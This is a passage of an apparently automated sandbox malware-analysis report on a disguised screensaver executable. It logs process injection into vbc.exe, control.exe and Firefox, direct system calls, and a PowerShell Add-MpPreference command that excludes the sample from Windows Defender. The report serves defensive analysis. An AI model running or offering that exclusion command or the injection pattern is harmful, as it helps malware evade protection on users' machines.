                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05674180 mov eax, dword ptr fs:[00000030h]4_2_05674180
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05674180 mov eax, dword ptr fs:[00000030h]4_2_05674180
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0565019F mov eax, dword ptr fs:[00000030h]4_2_0565019F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0565019F mov eax, dword ptr fs:[00000030h]4_2_0565019F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0565019F mov eax, dword ptr fs:[00000030h]4_2_0565019F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0565019F mov eax, dword ptr fs:[00000030h]4_2_0565019F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055D2050 mov eax, dword ptr fs:[00000030h]4_2_055D2050
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055FC073 mov eax, dword ptr fs:[00000030h]4_2_055FC073
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05656050 mov eax, dword ptr fs:[00000030h]4_2_05656050
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055EE016 mov eax, dword ptr fs:[00000030h]4_2_055EE016
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055EE016 mov eax, dword ptr fs:[00000030h]4_2_055EE016
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055EE016 mov eax, dword ptr fs:[00000030h]4_2_055EE016
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055EE016 mov eax, dword ptr fs:[00000030h]4_2_055EE016
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05666030 mov eax, dword ptr fs:[00000030h]4_2_05666030
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05654000 mov ecx, dword ptr fs:[00000030h]4_2_05654000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05672000 mov eax, dword ptr fs:[00000030h]4_2_05672000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05672000 mov eax, dword ptr fs:[00000030h]4_2_05672000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05672000 mov eax, dword ptr fs:[00000030h]4_2_05672000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05672000 mov eax, dword ptr fs:[00000030h]4_2_05672000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05672000 mov eax, dword ptr fs:[00000030h]4_2_05672000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05672000 mov eax, dword ptr fs:[00000030h]4_2_05672000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05672000 mov eax, dword ptr fs:[00000030h]4_2_05672000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05672000 mov eax, dword ptr fs:[00000030h]4_2_05672000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055CA020 mov eax, dword ptr fs:[00000030h]4_2_055CA020
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055CC020 mov eax, dword ptr fs:[00000030h]4_2_055CC020
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056560E0 mov eax, dword ptr fs:[00000030h]4_2_056560E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056120F0 mov ecx, dword ptr fs:[00000030h]4_2_056120F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055CC0F0 mov eax, dword ptr fs:[00000030h]4_2_055CC0F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055D80E9 mov eax, dword ptr fs:[00000030h]4_2_055D80E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056520DE mov eax, dword ptr fs:[00000030h]4_2_056520DE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055CA0E3 mov ecx, dword ptr fs:[00000030h]4_2_055CA0E3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056680A8 mov eax, dword ptr fs:[00000030h]4_2_056680A8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056960B8 mov eax, dword ptr fs:[00000030h]4_2_056960B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056960B8 mov ecx, dword ptr fs:[00000030h]4_2_056960B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055D208A mov eax, dword ptr fs:[00000030h]4_2_055D208A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055C80A0 mov eax, dword ptr fs:[00000030h]4_2_055C80A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0567437C mov eax, dword ptr fs:[00000030h]4_2_0567437C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056A634F mov eax, dword ptr fs:[00000030h]4_2_056A634F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05652349 mov eax, dword ptr fs:[00000030h]4_2_05652349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05652349 mov eax, dword ptr fs:[00000030h]4_2_05652349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05652349 mov eax, dword ptr fs:[00000030h]4_2_05652349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05652349 mov eax, dword ptr fs:[00000030h]4_2_05652349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05652349 mov eax, dword ptr fs:[00000030h]4_2_05652349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05652349 mov eax, dword ptr fs:[00000030h]4_2_05652349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05652349 mov eax, dword ptr fs:[00000030h]4_2_05652349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05652349 mov eax, dword ptr fs:[00000030h]4_2_05652349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05652349 mov eax, dword ptr fs:[00000030h]4_2_05652349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05652349 mov eax, dword ptr fs:[00000030h]4_2_05652349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05652349 mov eax, dword ptr fs:[00000030h]4_2_05652349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05652349 mov eax, dword ptr fs:[00000030h]4_2_05652349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05652349 mov eax, dword ptr fs:[00000030h]4_2_05652349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05652349 mov eax, dword ptr fs:[00000030h]4_2_05652349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05652349 mov eax, dword ptr fs:[00000030h]4_2_05652349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05678350 mov ecx, dword ptr fs:[00000030h]4_2_05678350
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0565035C mov eax, dword ptr fs:[00000030h]4_2_0565035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0565035C mov eax, dword ptr fs:[00000030h]4_2_0565035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0565035C mov eax, dword ptr fs:[00000030h]4_2_0565035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0565035C mov ecx, dword ptr fs:[00000030h]4_2_0565035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0565035C mov eax, dword ptr fs:[00000030h]4_2_0565035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0565035C mov eax, dword ptr fs:[00000030h]4_2_0565035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0569A352 mov eax, dword ptr fs:[00000030h]4_2_0569A352
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055CC310 mov ecx, dword ptr fs:[00000030h]4_2_055CC310
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056A8324 mov eax, dword ptr fs:[00000030h]4_2_056A8324
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056A8324 mov ecx, dword ptr fs:[00000030h]4_2_056A8324
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056A8324 mov eax, dword ptr fs:[00000030h]4_2_056A8324
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056A8324 mov eax, dword ptr fs:[00000030h]4_2_056A8324
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055F0310 mov ecx, dword ptr fs:[00000030h]4_2_055F0310
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0560A30B mov eax, dword ptr fs:[00000030h]4_2_0560A30B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0560A30B mov eax, dword ptr fs:[00000030h]4_2_0560A30B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0560A30B mov eax, dword ptr fs:[00000030h]4_2_0560A30B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055DA3C0 mov eax, dword ptr fs:[00000030h]4_2_055DA3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055DA3C0 mov eax, dword ptr fs:[00000030h]4_2_055DA3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055DA3C0 mov eax, dword ptr fs:[00000030h]4_2_055DA3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055DA3C0 mov eax, dword ptr fs:[00000030h]4_2_055DA3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055DA3C0 mov eax, dword ptr fs:[00000030h]4_2_055DA3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055DA3C0 mov eax, dword ptr fs:[00000030h]4_2_055DA3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055D83C0 mov eax, dword ptr fs:[00000030h]4_2_055D83C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055D83C0 mov eax, dword ptr fs:[00000030h]4_2_055D83C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055D83C0 mov eax, dword ptr fs:[00000030h]4_2_055D83C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055D83C0 mov eax, dword ptr fs:[00000030h]4_2_055D83C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056063FF mov eax, dword ptr fs:[00000030h]4_2_056063FF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0568C3CD mov eax, dword ptr fs:[00000030h]4_2_0568C3CD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056563C0 mov eax, dword ptr fs:[00000030h]4_2_056563C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055EE3F0 mov eax, dword ptr fs:[00000030h]4_2_055EE3F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055EE3F0 mov eax, dword ptr fs:[00000030h]4_2_055EE3F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055EE3F0 mov eax, dword ptr fs:[00000030h]4_2_055EE3F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056743D4 mov eax, dword ptr fs:[00000030h]4_2_056743D4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056743D4 mov eax, dword ptr fs:[00000030h]4_2_056743D4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055E03E9 mov eax, dword ptr fs:[00000030h]4_2_055E03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055E03E9 mov eax, dword ptr fs:[00000030h]4_2_055E03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055E03E9 mov eax, dword ptr fs:[00000030h]4_2_055E03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055E03E9 mov eax, dword ptr fs:[00000030h]4_2_055E03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055E03E9 mov eax, dword ptr fs:[00000030h]4_2_055E03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055E03E9 mov eax, dword ptr fs:[00000030h]4_2_055E03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055E03E9 mov eax, dword ptr fs:[00000030h]4_2_055E03E9
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exe Process token adjusted: Debug
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exe Memory allocated: page read and write | page guard

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exe"
                Source: C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe NtWriteVirtualMemory: Direct from: 0x76F0490C
                Source: C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe NtAllocateVirtualMemory: Direct from: 0x76F03C9C
                Source: C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe NtClose: Direct from: 0x76F02B6C
                Source: C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe NtReadVirtualMemory: Direct from: 0x76F02E8C
                Source: C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe NtCreateKey: Direct from: 0x76F02C6C
                Source: C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe NtSetInformationThread: Direct from: 0x76F02B4C
                Source: C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe NtQueryAttributesFile: Direct from: 0x76F02E6C
                Source: C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe NtAllocateVirtualMemory: Direct from: 0x76F048EC
                Source: C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe NtQuerySystemInformation: Direct from: 0x76F048CC
                Source: C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe NtQueryVolumeInformationFile: Direct from: 0x76F02F2C
                Source: C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe NtOpenSection: Direct from: 0x76F02E0C
                Source: C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe NtSetInformationThread: Direct from: 0x76EF63F9
                Source: C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe NtDeviceIoControlFile: Direct from: 0x76F02AEC
                Source: C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe NtAllocateVirtualMemory: Direct from: 0x76F02BEC
                Source: C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe NtCreateFile: Direct from: 0x76F02FEC
                Source: C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe NtOpenFile: Direct from: 0x76F02DCC
                Source: C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe NtQueryInformationToken: Direct from: 0x76F02CAC
                Source: C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe NtTerminateThread: Direct from: 0x76F02FCC
                Source: C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe NtProtectVirtualMemory: Direct from: 0x76EF7B2E
                Source: C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe NtOpenKeyEx: Direct from: 0x76F02B9C
                Source: C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe NtProtectVirtualMemory: Direct from: 0x76F02F9C
                Source: C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe NtSetInformationProcess: Direct from: 0x76F02C5C
                Source: C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe NtNotifyChangeKey: Direct from: 0x76F03C2C
                Source: C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe NtCreateMutant: Direct from: 0x76F035CC
                Source: C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe NtWriteVirtualMemory: Direct from: 0x76F02E3C
                Source: C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe NtMapViewOfSection: Direct from: 0x76F02D1C
                Source: C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe NtResumeThread: Direct from: 0x76F036AC
                Source: C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe NtAllocateVirtualMemory: Direct from: 0x76F02BFC
                Source: C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe NtReadFile: Direct from: 0x76F02ADC
                Source: C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe NtQuerySystemInformation: Direct from: 0x76F02DFC
                Source: C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe NtDelayExecution: Direct from: 0x76F02DDC
                Source: C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe NtQueryInformationProcess: Direct from: 0x76F02C26
                Source: C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe NtResumeThread: Direct from: 0x76F02FBC
                Source: C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe NtCreateUserProcess: Direct from: 0x76F0371C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Section loaded: NULL target: C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe protection: execute and read and write
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Section loaded: NULL target: C:\Windows\SysWOW64\control.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\control.exe Section loaded: NULL target: C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe protection: read write
                Source: C:\Windows\SysWOW64\control.exe Section loaded: NULL target: C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\control.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
                Source: C:\Windows\SysWOW64\control.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\control.exe Thread register set: target process: 8128
                Source: C:\Windows\SysWOW64\control.exe Thread APC queued: target process: C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exe"
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
                Source: C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe Process created: C:\Windows\SysWOW64\control.exe "C:\Windows\SysWOW64\control.exe"
                Source: C:\Windows\SysWOW64\control.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: uFLByAWAOFbhtV.exe, 00000005.00000002.4132994444.0000000000E01000.00000002.00000001.00040000.00000000.sdmp, uFLByAWAOFbhtV.exe, 00000005.00000000.1766717315.0000000000E00000.00000002.00000001.00040000.00000000.sdmp, uFLByAWAOFbhtV.exe, 0000000A.00000002.4132954868.0000000001AA1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
                Source: uFLByAWAOFbhtV.exe, 00000005.00000002.4132994444.0000000000E01000.00000002.00000001.00040000.00000000.sdmp, uFLByAWAOFbhtV.exe, 00000005.00000000.1766717315.0000000000E00000.00000002.00000001.00040000.00000000.sdmp, uFLByAWAOFbhtV.exe, 0000000A.00000002.4132954868.0000000001AA1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
                Source: uFLByAWAOFbhtV.exe, 00000005.00000002.4132994444.0000000000E01000.00000002.00000001.00040000.00000000.sdmp, uFLByAWAOFbhtV.exe, 00000005.00000000.1766717315.0000000000E00000.00000002.00000001.00040000.00000000.sdmp, uFLByAWAOFbhtV.exe, 0000000A.00000002.4132954868.0000000001AA1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
                Source: uFLByAWAOFbhtV.exe, 00000005.00000002.4132994444.0000000000E01000.00000002.00000001.00040000.00000000.sdmp, uFLByAWAOFbhtV.exe, 00000005.00000000.1766717315.0000000000E00000.00000002.00000001.00040000.00000000.sdmp, uFLByAWAOFbhtV.exe, 0000000A.00000002.4132954868.0000000001AA1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: }Program Manager
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exe Queries volume information: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exe VolumeInformation
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\DUBAI-MEDIUM.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\DUBAI-LIGHT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\DUBAI-BOLD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
